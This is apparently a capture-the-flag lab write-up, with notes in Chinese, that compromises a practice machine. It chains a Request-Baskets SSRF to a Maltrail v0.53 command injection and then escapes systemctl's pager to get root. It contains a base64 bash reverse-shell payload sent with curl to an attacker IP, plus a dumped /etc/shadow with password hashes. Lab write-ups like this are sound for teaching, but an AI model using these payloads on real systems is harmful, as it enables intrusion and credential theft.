Recon
nmap -sC -A -p- --min-rate 1000 -T4 10.10.11.224
# Nmap 7.94SVN scan initiated Tue Jan 2 09:35:58 2024 as: nmap -sC -A -p22,80,8338,55555, -oN nmap.txt --append-out 10.10.11.224
Nmap scan report for 10.10.11.224
Host is up (0.22s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed (RSA)
| 256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 (ECDSA)
|_ 256 b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519)
80/tcp filtered http
8338/tcp filtered unknown
55555/tcp open unknown
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| X-Content-Type-Options: nosniff
| Date: Tue, 02 Jan 2024 01:36:46 GMT
| Content-Length: 75
| invalid basket name; the name does not match pattern: ^[wd-_\.]{1,250}$
| GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Content-Type: text/html; charset=utf-8
| Location: /web
| Date: Tue, 02 Jan 2024 01:36:15 GMT
| Content-Length: 27
| href="/web">Found</a>.
| HTTPOptions:
| HTTP/1.0 200 OK
| Allow: GET, OPTIONS
| Date: Tue, 02 Jan 2024 01:36:16 GMT
|_ Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port55555-TCP:V=7.94SVN%I=7%D=1/2%Time=6593688F%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,A2,"HTTP/1\.0\x20302\x20Found\r\nContent-Type:\x20text/html
SF:;\x20charset=utf-8\r\nLocation:\x20/web\r\nDate:\x20Tue,\x2002\x20Jan\x
SF:202024\x2001:36:15\x20GMT\r\nContent-Length:\x2027\r\n\r\n<a\x20href=\"
SF:/web\">Found</a>\.\n\n")%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20
SF:Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:
SF:\x20close\r\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,60,"HTTP/1\.0\x2
SF:0200\x20OK\r\nAllow:\x20GET,\x20OPTIONS\r\nDate:\x20Tue,\x2002\x20Jan\x
SF:202024\x2001:36:16\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPReque
SF:st,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plai
SF:n;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Reques
SF:t")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nC
SF:ontent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\
SF:n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1\.1\x2040
SF:0\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\
SF:nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSessionReq,67
SF:,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x2
SF:0charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r
SF:(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20te
SF:xt/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x2
SF:0Request")%r(FourOhFourRequest,EA,"HTTP/1\.0\x20400\x20Bad\x20Request\r
SF:\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nX-Content-Type-Optio
SF:ns:\x20nosniff\r\nDate:\x20Tue,\x2002\x20Jan\x202024\x2001:36:46\x20GMT
SF:\r\nContent-Length:\x2075\r\n\r\ninvalid\x20basket\x20name;\x20the\x20n
SF:ame\x20does\x20not\x20match\x20pattern:\x20\^\[\\w\\d\\-_\\\.\]{1,250}\
SF:$\n")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Typ
SF:e:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x
SF:20Bad\x20Request")%r(LDAPSearchReq,67,"HTTP/1\.1\x20400\x20Bad\x20Reque
SF:st\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20c
SF:lose\r\n\r\n400\x20Bad\x20Request");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 - 5.4 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 259.59 ms 10.10.16.1
2 185.75 ms 10.10.11.224
只有 22 和 55555 可以访问
Shell as user - puma
访问 55555 端口

Request-Baskets,可以实现服务端代理请求,结合端口发现,访问本地 80 端口。

发现 Maltrail 服务v0.53

该版本存在命令注入漏洞,漏洞点在 login 路径,post 请求包中的 username 参数
https://github.com/spookier/Maltrail-v0.53-Exploit/blob/main/exploit.py
构造反弹 shell echo -e '/bin/bash -c "bash -i >& /dev/tcp/10.10.16.3/2233 0>&1"' | base64
L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjMvMjIzMyAwPiYxIgo=
修改 Request-Baskets

发送请求
curl 'http://10.10.11.224:55555/70aohtj' --data 'username=;`echo+"L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjMvMjIzMyAwPiYxJwo="+|+base64+-d+|+sh`'

Shell as root
查看 sudo 权限

使用 sudo /usr/bin/systemctl status trail.service 查看服务状态时,可以通过 !/bin/bash 获得 shell

Pass Hash
cat /etc/shadow
root:$6$4IguUssRBYl3/LvG$MfnFD1Y9saTrvw2OqA1VtqKxa7TsDt1kb2qsJw6inQ8GfmnqIrh32eqk9IMO4UR3fYG.TzbJeiFd7UOu1QlGR0:19461:0:99999:7:::
daemon:*:19367:0:99999:7:::
bin:*:19367:0:99999:7:::
sys:*:19367:0:99999:7:::
sync:*:19367:0:99999:7:::
games:*:19367:0:99999:7:::
man:*:19367:0:99999:7:::
lp:*:19367:0:99999:7:::
mail:*:19367:0:99999:7:::
news:*:19367:0:99999:7:::
uucp:*:19367:0:99999:7:::
proxy:*:19367:0:99999:7:::
www-data:*:19367:0:99999:7:::
backup:*:19367:0:99999:7:::
list:*:19367:0:99999:7:::
irc:*:19367:0:99999:7:::
gnats:*:19367:0:99999:7:::
nobody:*:19367:0:99999:7:::
systemd-network:*:19367:0:99999:7:::
systemd-resolve:*:19367:0:99999:7:::
systemd-timesync:*:19367:0:99999:7:::
messagebus:*:19367:0:99999:7:::
syslog:*:19367:0:99999:7:::
_apt:*:19367:0:99999:7:::
tss:*:19367:0:99999:7:::
uuidd:*:19367:0:99999:7:::
tcpdump:*:19367:0:99999:7:::
sshd:*:19367:0:99999:7:::
landscape:*:19367:0:99999:7:::
pollinate:*:19367:0:99999:7:::
fwupd-refresh:*:19367:0:99999:7:::
systemd-coredump:!!:19461::::::
lxd:!:19461::::::
puma:$6$eB4LwfQg7IgQC38d$SktdHbU0gQAh0.BoRY36FHreH6xR073oHdRrk6hmvar4eZTnmkfxbUxsMBsaZMRm9XHYQF9hG4l5v6fefYdic/:19461:0:99999:7:::
_laurel:!:19527::::::
